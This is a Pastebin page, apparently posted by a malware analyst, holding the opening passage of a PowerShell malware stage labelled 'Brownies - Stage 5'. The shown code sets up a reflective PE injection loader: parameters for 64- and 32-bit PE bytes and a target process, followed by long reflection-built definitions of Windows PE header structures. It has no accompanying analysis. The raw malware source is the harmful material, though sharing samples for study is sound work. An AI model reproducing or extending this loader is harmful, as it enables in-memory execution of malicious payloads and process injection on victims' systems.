Advertisement
dissectmalware

PowerShell Mal (Brownies) - Stage 5

Apr 1st, 2018
314
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
C# 499.61 KB | None | 0 0
  1. function get-fgruvers
  2. {
  3. [CmdletBinding()]
  4. Param(
  5. [Parameter(Position = 0)]
  6. [String[]]
  7. $ComputerName,
  8.     [Parameter(Position = 1, Mandatory = $false)]
  9.     [String]
  10.     $fpath,
  11.     [Parameter(Position = 2, Mandatory = $true)]
  12.     [String]
  13.     $idsid,
  14.     [Parameter(Position = 3, Mandatory = $true)]
  15.     [String]
  16.     $versid,
  17.     [Parameter(Position = 4, Mandatory = $true)]
  18.     [String]
  19.     $rckey
  20. )
  21. Set-StrictMode -Version 2
  22. $RemoteScriptBlock = {
  23. [CmdletBinding()]
  24. Param(
  25. [Parameter(Position = 0, Mandatory = $true)]
  26. [String]
  27. $PEBytes64,
  28.         [Parameter(Position = 1, Mandatory = $true)]
  29. [String]
  30. $PEBytes32,
  31. [Parameter(Position = 2, Mandatory = $false)]
  32. [String]
  33. $FuncReturnType,
  34. [Parameter(Position = 3, Mandatory = $false)]
  35. [Int32]
  36. $ProcId,
  37. [Parameter(Position = 4, Mandatory = $false)]
  38. [String]
  39. $ProcName,
  40.         [Parameter(Position = 5, Mandatory = $false)]
  41.         [String]
  42.         $ExeArgs
  43. )
  44. Function Get-Win32Types
  45. {
  46. $Win32Types = New-Object System.Object
  47. $Domain = [AppDomain]::CurrentDomain
  48. $DynamicAssembly = New-Object System.Reflection.AssemblyName('DynamicAssembly')
  49. $AssemblyBuilder = $Domain.DefineDynamicAssembly($DynamicAssembly, [System.Reflection.Emit.AssemblyBuilderAccess]::Run)
  50. $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('DynamicModule', $false)
  51. $ConstructorInfo = [System.Runtime.InteropServices.MarshalAsAttribute].GetConstructors()[0]
  52. $TypeBuilder = $ModuleBuilder.DefineEnum('MachineType', 'Public', [UInt16])
  53. $TypeBuilder.DefineLiteral('Native', [UInt16] 0) | Out-Null
  54. $TypeBuilder.DefineLiteral('I386', [UInt16] 0x014c) | Out-Null
  55. $TypeBuilder.DefineLiteral('Itanium', [UInt16] 0x0200) | Out-Null
  56. $TypeBuilder.DefineLiteral('x64', [UInt16] 0x8664) | Out-Null
  57. $MachineType = $TypeBuilder.CreateType()
  58. $Win32Types | Add-Member -MemberType NoteProperty -Name MachineType -Value $MachineType
  59. $TypeBuilder = $ModuleBuilder.DefineEnum('MagicType', 'Public', [UInt16])
  60. $TypeBuilder.DefineLiteral('IMAGE_NT_OPTIONAL_HDR32_MAGIC', [UInt16] 0x10b) | Out-Null
  61. $TypeBuilder.DefineLiteral('IMAGE_NT_OPTIONAL_HDR64_MAGIC', [UInt16] 0x20b) | Out-Null
  62. $MagicType = $TypeBuilder.CreateType()
  63. $Win32Types | Add-Member -MemberType NoteProperty -Name MagicType -Value $MagicType
  64. $TypeBuilder = $ModuleBuilder.DefineEnum('SubSystemType', 'Public', [UInt16])
  65. $TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_UNKNOWN', [UInt16] 0) | Out-Null
  66. $TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_NATIVE', [UInt16] 1) | Out-Null
  67. $TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_WINDOWS_GUI', [UInt16] 2) | Out-Null
  68. $TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_WINDOWS_CUI', [UInt16] 3) | Out-Null
  69. $TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_POSIX_CUI', [UInt16] 7) | Out-Null
  70. $TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_WINDOWS_CE_GUI', [UInt16] 9) | Out-Null
  71. $TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_EFI_APPLICATION', [UInt16] 10) | Out-Null
  72. $TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_EFI_BOOT_SERVICE_DRIVER', [UInt16] 11) | Out-Null
  73. $TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_EFI_RUNTIME_DRIVER', [UInt16] 12) | Out-Null
  74. $TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_EFI_ROM', [UInt16] 13) | Out-Null
  75. $TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_XBOX', [UInt16] 14) | Out-Null
  76. $SubSystemType = $TypeBuilder.CreateType()
  77. $Win32Types | Add-Member -MemberType NoteProperty -Name SubSystemType -Value $SubSystemType
  78. $TypeBuilder = $ModuleBuilder.DefineEnum('DllCharacteristicsType', 'Public', [UInt16])
  79. $TypeBuilder.DefineLiteral('RES_0', [UInt16] 0x0001) | Out-Null
  80. $TypeBuilder.DefineLiteral('RES_1', [UInt16] 0x0002) | Out-Null
  81. $TypeBuilder.DefineLiteral('RES_2', [UInt16] 0x0004) | Out-Null
  82. $TypeBuilder.DefineLiteral('RES_3', [UInt16] 0x0008) | Out-Null
  83. $TypeBuilder.DefineLiteral('IMAGE_DLL_CHARACTERISTICS_DYNAMIC_BASE', [UInt16] 0x0040) | Out-Null
  84. $TypeBuilder.DefineLiteral('IMAGE_DLL_CHARACTERISTICS_FORCE_INTEGRITY', [UInt16] 0x0080) | Out-Null
  85. $TypeBuilder.DefineLiteral('IMAGE_DLL_CHARACTERISTICS_NX_COMPAT', [UInt16] 0x0100) | Out-Null
  86. $TypeBuilder.DefineLiteral('IMAGE_DLLCHARACTERISTICS_NO_ISOLATION', [UInt16] 0x0200) | Out-Null
  87. $TypeBuilder.DefineLiteral('IMAGE_DLLCHARACTERISTICS_NO_SEH', [UInt16] 0x0400) | Out-Null
  88. $TypeBuilder.DefineLiteral('IMAGE_DLLCHARACTERISTICS_NO_BIND', [UInt16] 0x0800) | Out-Null
  89. $TypeBuilder.DefineLiteral('RES_4', [UInt16] 0x1000) | Out-Null
  90. $TypeBuilder.DefineLiteral('IMAGE_DLLCHARACTERISTICS_WDM_DRIVER', [UInt16] 0x2000) | Out-Null
  91. $TypeBuilder.DefineLiteral('IMAGE_DLLCHARACTERISTICS_TERMINAL_SERVER_AWARE', [UInt16] 0x8000) | Out-Null
  92. $DllCharacteristicsType = $TypeBuilder.CreateType()
  93. $Win32Types | Add-Member -MemberType NoteProperty -Name DllCharacteristicsType -Value $DllCharacteristicsType
  94. $Attributes = 'AutoLayout, AnsiClass, Class, Public, ExplicitLayout, Sealed, BeforeFieldInit'
  95. $TypeBuilder = $ModuleBuilder.DefineType('IMAGE_DATA_DIRECTORY', $Attributes, [System.ValueType], 8)
  96. ($TypeBuilder.DefineField('VirtualAddress', [UInt32], 'Public')).SetOffset(0) | Out-Null
  97. ($TypeBuilder.DefineField('Size', [UInt32], 'Public')).SetOffset(4) | Out-Null
  98. $IMAGE_DATA_DIRECTORY = $TypeBuilder.CreateType()
  99. $Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_DATA_DIRECTORY -Value $IMAGE_DATA_DIRECTORY
  100. $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'
  101. $TypeBuilder = $ModuleBuilder.DefineType('IMAGE_FILE_HEADER', $Attributes, [System.ValueType], 20)
  102. $TypeBuilder.DefineField('Machine', [UInt16], 'Public') | Out-Null
  103. $TypeBuilder.DefineField('NumberOfSections', [UInt16], 'Public') | Out-Null
  104. $TypeBuilder.DefineField('TimeDateStamp', [UInt32], 'Public') | Out-Null
  105. $TypeBuilder.DefineField('PointerToSymbolTable', [UInt32], 'Public') | Out-Null
  106. $TypeBuilder.DefineField('NumberOfSymbols', [UInt32], 'Public') | Out-Null
  107. $TypeBuilder.DefineField('SizeOfOptionalHeader', [UInt16], 'Public') | Out-Null
  108. $TypeBuilder.DefineField('Characteristics', [UInt16], 'Public') | Out-Null
  109. $IMAGE_FILE_HEADER = $TypeBuilder.CreateType()
  110. $Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_FILE_HEADER -Value $IMAGE_FILE_HEADER
  111. $Attributes = 'AutoLayout, AnsiClass, Class, Public, ExplicitLayout, Sealed, BeforeFieldInit'
  112. $TypeBuilder = $ModuleBuilder.DefineType('IMAGE_OPTIONAL_HEADER64', $Attributes, [System.ValueType], 240)
  113. ($TypeBuilder.DefineField('Magic', $MagicType, 'Public')).SetOffset(0) | Out-Null
  114. ($TypeBuilder.DefineField('MajorLinkerVersion', [Byte], 'Public')).SetOffset(2) | Out-Null
  115. ($TypeBuilder.DefineField('MinorLinkerVersion', [Byte], 'Public')).SetOffset(3) | Out-Null
  116. ($TypeBuilder.DefineField('SizeOfCode', [UInt32], 'Public')).SetOffset(4) | Out-Null
  117. ($TypeBuilder.DefineField('SizeOfInitializedData', [UInt32], 'Public')).SetOffset(8) | Out-Null
  118. ($TypeBuilder.DefineField('SizeOfUninitializedData', [UInt32], 'Public')).SetOffset(12) | Out-Null
  119. ($TypeBuilder.DefineField('AddressOfEntryPoint', [UInt32], 'Public')).SetOffset(16) | Out-Null
  120. ($TypeBuilder.DefineField('BaseOfCode', [UInt32], 'Public')).SetOffset(20) | Out-Null
  121. ($TypeBuilder.DefineField('ImageBase', [UInt64], 'Public')).SetOffset(24) | Out-Null
  122. ($TypeBuilder.DefineField('SectionAlignment', [UInt32], 'Public')).SetOffset(32) | Out-Null
  123. ($TypeBuilder.DefineField('FileAlignment', [UInt32], 'Public')).SetOffset(36) | Out-Null
  124. ($TypeBuilder.DefineField('MajorOperatingSystemVersion', [UInt16], 'Public')).SetOffset(40) | Out-Null
  125. ($TypeBuilder.DefineField('MinorOperatingSystemVersion', [UInt16], 'Public')).SetOffset(42) | Out-Null
  126. ($TypeBuilder.DefineField('MajorImageVersion', [UInt16], 'Public')).SetOffset(44) | Out-Null
  127. ($TypeBuilder.DefineField('MinorImageVersion', [UInt16], 'Public')).SetOffset(46) | Out-Null
  128. ($TypeBuilder.DefineField('MajorSubsystemVersion', [UInt16], 'Public')).SetOffset(48) | Out-Null
  129. ($TypeBuilder.DefineField('MinorSubsystemVersion', [UInt16], 'Public')).SetOffset(50) | Out-Null
  130. ($TypeBuilder.DefineField('Win32VersionValue', [UInt32], 'Public')).SetOffset(52) | Out-Null
  131. ($TypeBuilder.DefineField('SizeOfImage', [UInt32], 'Public')).SetOffset(56) | Out-Null
  132. ($TypeBuilder.DefineField('SizeOfHeaders', [UInt32], 'Public')).SetOffset(60) | Out-Null
  133. ($TypeBuilder.DefineField('CheckSum', [UInt32], 'Public')).SetOffset(64) | Out-Null
  134. ($TypeBuilder.DefineField('Subsystem', $SubSystemType, 'Public')).SetOffset(68) | Out-Null
  135. ($TypeBuilder.DefineField('DllCharacteristics', $DllCharacteristicsType, 'Public')).SetOffset(70) | Out-Null
  136. ($TypeBuilder.DefineField('SizeOfStackReserve', [UInt64], 'Public')).SetOffset(72) | Out-Null
  137. ($TypeBuilder.DefineField('SizeOfStackCommit', [UInt64], 'Public')).SetOffset(80) | Out-Null
  138. ($TypeBuilder.DefineField('SizeOfHeapReserve', [UInt64], 'Public')).SetOffset(88) | Out-Null
  139. ($TypeBuilder.DefineField('SizeOfHeapCommit', [UInt64], 'Public')).SetOffset(96) | Out-Null
  140. ($TypeBuilder.DefineField('LoaderFlags', [UInt32], 'Public')).SetOffset(104) | Out-Null
  141. ($TypeBuilder.DefineField('NumberOfRvaAndSizes', [UInt32], 'Public')).SetOffset(108) | Out-Null
  142. ($TypeBuilder.DefineField('ExportTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(112) | Out-Null
  143. ($TypeBuilder.DefineField('ImportTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(120) | Out-Null
  144. ($TypeBuilder.DefineField('ResourceTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(128) | Out-Null
  145. ($TypeBuilder.DefineField('ExceptionTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(136) | Out-Null
  146. ($TypeBuilder.DefineField('CertificateTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(144) | Out-Null
  147. ($TypeBuilder.DefineField('BaseRelocationTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(152) | Out-Null
  148. ($TypeBuilder.DefineField('Debug', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(160) | Out-Null
  149. ($TypeBuilder.DefineField('Architecture', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(168) | Out-Null
  150. ($TypeBuilder.DefineField('GlobalPtr', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(176) | Out-Null
  151. ($TypeBuilder.DefineField('TLSTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(184) | Out-Null
  152. ($TypeBuilder.DefineField('LoadConfigTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(192) | Out-Null
  153. ($TypeBuilder.DefineField('BoundImport', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(200) | Out-Null
  154. ($TypeBuilder.DefineField('IAT', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(208) | Out-Null
  155. ($TypeBuilder.DefineField('DelayImportDescriptor', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(216) | Out-Null
  156. ($TypeBuilder.DefineField('CLRRuntimeHeader', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(224) | Out-Null
  157. ($TypeBuilder.DefineField('Reserved', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(232) | Out-Null
  158. $IMAGE_OPTIONAL_HEADER64 = $TypeBuilder.CreateType()
  159. $Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_OPTIONAL_HEADER64 -Value $IMAGE_OPTIONAL_HEADER64
  160. $Attributes = 'AutoLayout, AnsiClass, Class, Public, ExplicitLayout, Sealed, BeforeFieldInit'
  161. $TypeBuilder = $ModuleBuilder.DefineType('IMAGE_OPTIONAL_HEADER32', $Attributes, [System.ValueType], 224)
  162. ($TypeBuilder.DefineField('Magic', $MagicType, 'Public')).SetOffset(0) | Out-Null
  163. ($TypeBuilder.DefineField('MajorLinkerVersion', [Byte], 'Public')).SetOffset(2) | Out-Null
  164. ($TypeBuilder.DefineField('MinorLinkerVersion', [Byte], 'Public')).SetOffset(3) | Out-Null
  165. ($TypeBuilder.DefineField('SizeOfCode', [UInt32], 'Public')).SetOffset(4) | Out-Null
  166. ($TypeBuilder.DefineField('SizeOfInitializedData', [UInt32], 'Public')).SetOffset(8) | Out-Null
  167. ($TypeBuilder.DefineField('SizeOfUninitializedData', [UInt32], 'Public')).SetOffset(12) | Out-Null
  168. ($TypeBuilder.DefineField('AddressOfEntryPoint', [UInt32], 'Public')).SetOffset(16) | Out-Null
  169. ($TypeBuilder.DefineField('BaseOfCode', [UInt32], 'Public')).SetOffset(20) | Out-Null
  170. ($TypeBuilder.DefineField('BaseOfData', [UInt32], 'Public')).SetOffset(24) | Out-Null
  171. ($TypeBuilder.DefineField('ImageBase', [UInt32], 'Public')).SetOffset(28) | Out-Null
  172. ($TypeBuilder.DefineField('SectionAlignment', [UInt32], 'Public')).SetOffset(32) | Out-Null
  173. ($TypeBuilder.DefineField('FileAlignment', [UInt32], 'Public')).SetOffset(36) | Out-Null
  174. ($TypeBuilder.DefineField('MajorOperatingSystemVersion', [UInt16], 'Public')).SetOffset(40) | Out-Null
  175. ($TypeBuilder.DefineField('MinorOperatingSystemVersion', [UInt16], 'Public')).SetOffset(42) | Out-Null
  176. ($TypeBuilder.DefineField('MajorImageVersion', [UInt16], 'Public')).SetOffset(44) | Out-Null
  177. ($TypeBuilder.DefineField('MinorImageVersion', [UInt16], 'Public')).SetOffset(46) | Out-Null
  178. ($TypeBuilder.DefineField('MajorSubsystemVersion', [UInt16], 'Public')).SetOffset(48) | Out-Null
  179. ($TypeBuilder.DefineField('MinorSubsystemVersion', [UInt16], 'Public')).SetOffset(50) | Out-Null
  180. ($TypeBuilder.DefineField('Win32VersionValue', [UInt32], 'Public')).SetOffset(52) | Out-Null
  181. ($TypeBuilder.DefineField('SizeOfImage', [UInt32], 'Public')).SetOffset(56) | Out-Null
  182. ($TypeBuilder.DefineField('SizeOfHeaders', [UInt32], 'Public')).SetOffset(60) | Out-Null
  183. ($TypeBuilder.DefineField('CheckSum', [UInt32], 'Public')).SetOffset(64) | Out-Null
  184. ($TypeBuilder.DefineField('Subsystem', $SubSystemType, 'Public')).SetOffset(68) | Out-Null
  185. ($TypeBuilder.DefineField('DllCharacteristics', $DllCharacteristicsType, 'Public')).SetOffset(70) | Out-Null
  186. ($TypeBuilder.DefineField('SizeOfStackReserve', [UInt32], 'Public')).SetOffset(72) | Out-Null
  187. ($TypeBuilder.DefineField('SizeOfStackCommit', [UInt32], 'Public')).SetOffset(76) | Out-Null
  188. ($TypeBuilder.DefineField('SizeOfHeapReserve', [UInt32], 'Public')).SetOffset(80) | Out-Null
  189. ($TypeBuilder.DefineField('SizeOfHeapCommit', [UInt32], 'Public')).SetOffset(84) | Out-Null
  190. ($TypeBuilder.DefineField('LoaderFlags', [UInt32], 'Public')).SetOffset(88) | Out-Null
  191. ($TypeBuilder.DefineField('NumberOfRvaAndSizes', [UInt32], 'Public')).SetOffset(92) | Out-Null
  192. ($TypeBuilder.DefineField('ExportTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(96) | Out-Null
  193. ($TypeBuilder.DefineField('ImportTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(104) | Out-Null
  194. ($TypeBuilder.DefineField('ResourceTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(112) | Out-Null
  195. ($TypeBuilder.DefineField('ExceptionTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(120) | Out-Null
  196. ($TypeBuilder.DefineField('CertificateTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(128) | Out-Null
  197. ($TypeBuilder.DefineField('BaseRelocationTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(136) | Out-Null
  198. ($TypeBuilder.DefineField('Debug', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(144) | Out-Null
  199. ($TypeBuilder.DefineField('Architecture', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(152) | Out-Null
  200. ($TypeBuilder.DefineField('GlobalPtr', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(160) | Out-Null
  201. ($TypeBuilder.DefineField('TLSTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(168) | Out-Null
  202. ($TypeBuilder.DefineField('LoadConfigTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(176) | Out-Null
  203. ($TypeBuilder.DefineField('BoundImport', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(184) | Out-Null
  204. ($TypeBuilder.DefineField('IAT', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(192) | Out-Null
  205. ($TypeBuilder.DefineField('DelayImportDescriptor', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(200) | Out-Null
  206. ($TypeBuilder.DefineField('CLRRuntimeHeader', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(208) | Out-Null
  207. ($TypeBuilder.DefineField('Reserved', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(216) | Out-Null
  208. $IMAGE_OPTIONAL_HEADER32 = $TypeBuilder.CreateType()
  209. $Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_OPTIONAL_HEADER32 -Value $IMAGE_OPTIONAL_HEADER32
  210. $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'
  211. $TypeBuilder = $ModuleBuilder.DefineType('IMAGE_NT_HEADERS64', $Attributes, [System.ValueType], 264)
  212. $TypeBuilder.DefineField('Signature', [UInt32], 'Public') | Out-Null
  213. $TypeBuilder.DefineField('FileHeader', $IMAGE_FILE_HEADER, 'Public') | Out-Null
  214. $TypeBuilder.DefineField('OptionalHeader', $IMAGE_OPTIONAL_HEADER64, 'Public') | Out-Null
  215. $IMAGE_NT_HEADERS64 = $TypeBuilder.CreateType()
  216. $Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_NT_HEADERS64 -Value $IMAGE_NT_HEADERS64
  217. $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'
  218. $TypeBuilder = $ModuleBuilder.DefineType('IMAGE_NT_HEADERS32', $Attributes, [System.ValueType], 248)
  219. $TypeBuilder.DefineField('Signature', [UInt32], 'Public') | Out-Null
  220. $TypeBuilder.DefineField('FileHeader', $IMAGE_FILE_HEADER, 'Public') | Out-Null
  221. $TypeBuilder.DefineField('OptionalHeader', $IMAGE_OPTIONAL_HEADER32, 'Public') | Out-Null
  222. $IMAGE_NT_HEADERS32 = $TypeBuilder.CreateType()
  223. $Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_NT_HEADERS32 -Value $IMAGE_NT_HEADERS32
  224. $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'
  225. $TypeBuilder = $ModuleBuilder.DefineType('IMAGE_DOS_HEADER', $Attributes, [System.ValueType], 64)
  226. $TypeBuilder.DefineField('e_magic', [UInt16], 'Public') | Out-Null
  227. $TypeBuilder.DefineField('e_cblp', [UInt16], 'Public') | Out-Null
  228. $TypeBuilder.DefineField('e_cp', [UInt16], 'Public') | Out-Null
  229. $TypeBuilder.DefineField('e_crlc', [UInt16], 'Public') | Out-Null
  230. $TypeBuilder.DefineField('e_cparhdr', [UInt16], 'Public') | Out-Null
  231. $TypeBuilder.DefineField('e_minalloc', [UInt16], 'Public') | Out-Null
  232. $TypeBuilder.DefineField('e_maxalloc', [UInt16], 'Public') | Out-Null
  233. $TypeBuilder.DefineField('e_ss', [UInt16], 'Public') | Out-Null
  234. $TypeBuilder.DefineField('e_sp', [UInt16], 'Public') | Out-Null
  235. $TypeBuilder.DefineField('e_csum', [UInt16], 'Public') | Out-Null
  236. $TypeBuilder.DefineField('e_ip', [UInt16], 'Public') | Out-Null
  237. $TypeBuilder.DefineField('e_cs', [UInt16], 'Public') | Out-Null
  238. $TypeBuilder.DefineField('e_lfarlc', [UInt16], 'Public') | Out-Null
  239. $TypeBuilder.DefineField('e_ovno', [UInt16], 'Public') | Out-Null
  240. $e_resField = $TypeBuilder.DefineField('e_res', [UInt16[]], 'Public, HasFieldMarshal')
  241. $ConstructorValue = [System.Runtime.InteropServices.UnmanagedType]::ByValArray
  242. $FieldArray = @([System.Runtime.InteropServices.MarshalAsAttribute].GetField('SizeConst'))
  243. $AttribBuilder = New-Object System.Reflection.Emit.CustomAttributeBuilder($ConstructorInfo, $ConstructorValue, $FieldArray, @([Int32] 4))
  244. $e_resField.SetCustomAttribute($AttribBuilder)
  245. $TypeBuilder.DefineField('e_oemid', [UInt16], 'Public') | Out-Null
  246. $TypeBuilder.DefineField('e_oeminfo', [UInt16], 'Public') | Out-Null
  247. $e_res2Field = $TypeBuilder.DefineField('e_res2', [UInt16[]], 'Public, HasFieldMarshal')
  248. $ConstructorValue = [System.Runtime.InteropServices.UnmanagedType]::ByValArray
  249. $AttribBuilder = New-Object System.Reflection.Emit.CustomAttributeBuilder($ConstructorInfo, $ConstructorValue, $FieldArray, @([Int32] 10))
  250. $e_res2Field.SetCustomAttribute($AttribBuilder)
  251. $TypeBuilder.DefineField('e_lfanew', [Int32], 'Public') | Out-Null
  252. $IMAGE_DOS_HEADER = $TypeBuilder.CreateType()
  253. $Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_DOS_HEADER -Value $IMAGE_DOS_HEADER
  254. $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'
  255. $TypeBuilder = $ModuleBuilder.DefineType('IMAGE_SECTION_HEADER', $Attributes, [System.ValueType], 40)
  256. $nameField = $TypeBuilder.DefineField('Name', [Char[]], 'Public, HasFieldMarshal')
  257. $ConstructorValue = [System.Runtime.InteropServices.UnmanagedType]::ByValArray
  258. $AttribBuilder = New-Object System.Reflection.Emit.CustomAttributeBuilder($ConstructorInfo, $ConstructorValue, $FieldArray, @([Int32] 8))
  259. $nameField.SetCustomAttribute($AttribBuilder)
  260. $TypeBuilder.DefineField('VirtualSize', [UInt32], 'Public') | Out-Null
  261. $TypeBuilder.DefineField('VirtualAddress', [UInt32], 'Public') | Out-Null
  262. $TypeBuilder.DefineField('SizeOfRawData', [UInt32], 'Public') | Out-Null
  263. $TypeBuilder.DefineField('PointerToRawData', [UInt32], 'Public') | Out-Null
  264. $TypeBuilder.DefineField('PointerToRelocations', [UInt32], 'Public') | Out-Null
  265. $TypeBuilder.DefineField('PointerToLinenumbers', [UInt32], 'Public') | Out-Null
  266. $TypeBuilder.DefineField('NumberOfRelocations', [UInt16], 'Public') | Out-Null
  267. $TypeBuilder.DefineField('NumberOfLinenumbers', [UInt16], 'Public') | Out-Null
  268. $TypeBuilder.DefineField('Characteristics', [UInt32], 'Public') | Out-Null
  269. $IMAGE_SECTION_HEADER = $TypeBuilder.CreateType()
  270. $Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_SECTION_HEADER -Value $IMAGE_SECTION_HEADER
  271. $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'
  272. $TypeBuilder = $ModuleBuilder.DefineType('IMAGE_BASE_RELOCATION', $Attributes, [System.ValueType], 8)
  273. $TypeBuilder.DefineField('VirtualAddress', [UInt32], 'Public') | Out-Null
  274. $TypeBuilder.DefineField('SizeOfBlock', [UInt32], 'Public') | Out-Null
  275. $IMAGE_BASE_RELOCATION = $TypeBuilder.CreateType()
  276. $Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_BASE_RELOCATION -Value $IMAGE_BASE_RELOCATION
  277. $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'
  278. $TypeBuilder = $ModuleBuilder.DefineType('IMAGE_IMPORT_DESCRIPTOR', $Attributes, [System.ValueType], 20)
  279. $TypeBuilder.DefineField('Characteristics', [UInt32], 'Public') | Out-Null
  280. $TypeBuilder.DefineField('TimeDateStamp', [UInt32], 'Public') | Out-Null
  281. $TypeBuilder.DefineField('ForwarderChain', [UInt32], 'Public') | Out-Null
  282. $TypeBuilder.DefineField('Name', [UInt32], 'Public') | Out-Null
  283. $TypeBuilder.DefineField('FirstThunk', [UInt32], 'Public') | Out-Null
  284. $IMAGE_IMPORT_DESCRIPTOR = $TypeBuilder.CreateType()
  285. $Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_IMPORT_DESCRIPTOR -Value $IMAGE_IMPORT_DESCRIPTOR
  286. $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'
  287. $TypeBuilder = $ModuleBuilder.DefineType('IMAGE_EXPORT_DIRECTORY', $Attributes, [System.ValueType], 40)
  288. $TypeBuilder.DefineField('Characteristics', [UInt32], 'Public') | Out-Null
  289. $TypeBuilder.DefineField('TimeDateStamp', [UInt32], 'Public') | Out-Null
  290. $TypeBuilder.DefineField('MajorVersion', [UInt16], 'Public') | Out-Null
  291. $TypeBuilder.DefineField('MinorVersion', [UInt16], 'Public') | Out-Null
  292. $TypeBuilder.DefineField('Name', [UInt32], 'Public') | Out-Null
  293. $TypeBuilder.DefineField('Base', [UInt32], 'Public') | Out-Null
  294. $TypeBuilder.DefineField('NumberOfFunctions', [UInt32], 'Public') | Out-Null
  295. $TypeBuilder.DefineField('NumberOfNames', [UInt32], 'Public') | Out-Null
  296. $TypeBuilder.DefineField('AddressOfFunctions', [UInt32], 'Public') | Out-Null
  297. $TypeBuilder.DefineField('AddressOfNames', [UInt32], 'Public') | Out-Null
  298. $TypeBuilder.DefineField('AddressOfNameOrdinals', [UInt32], 'Public') | Out-Null
  299. $IMAGE_EXPORT_DIRECTORY = $TypeBuilder.CreateType()
  300. $Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_EXPORT_DIRECTORY -Value $IMAGE_EXPORT_DIRECTORY
  301. $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'
  302. $TypeBuilder = $ModuleBuilder.DefineType('LUID', $Attributes, [System.ValueType], 8)
  303. $TypeBuilder.DefineField('LowPart', [UInt32], 'Public') | Out-Null
  304. $TypeBuilder.DefineField('HighPart', [UInt32], 'Public') | Out-Null
  305. $LUID = $TypeBuilder.CreateType()
  306. $Win32Types | Add-Member -MemberType NoteProperty -Name LUID -Value $LUID
  307. $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'
  308. $TypeBuilder = $ModuleBuilder.DefineType('LUID_AND_ATTRIBUTES', $Attributes, [System.ValueType], 12)
  309. $TypeBuilder.DefineField('Luid', $LUID, 'Public') | Out-Null
  310. $TypeBuilder.DefineField('Attributes', [UInt32], 'Public') | Out-Null
  311. $LUID_AND_ATTRIBUTES = $TypeBuilder.CreateType()
  312. $Win32Types | Add-Member -MemberType NoteProperty -Name LUID_AND_ATTRIBUTES -Value $LUID_AND_ATTRIBUTES
  313. $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'
  314. $TypeBuilder = $ModuleBuilder.DefineType('TOKEN_PRIVILEGES', $Attributes, [System.ValueType], 16)
  315. $TypeBuilder.DefineField('PrivilegeCount', [UInt32], 'Public') | Out-Null
  316. $TypeBuilder.DefineField('Privileges', $LUID_AND_ATTRIBUTES, 'Public') | Out-Null
  317. $TOKEN_PRIVILEGES = $TypeBuilder.CreateType()
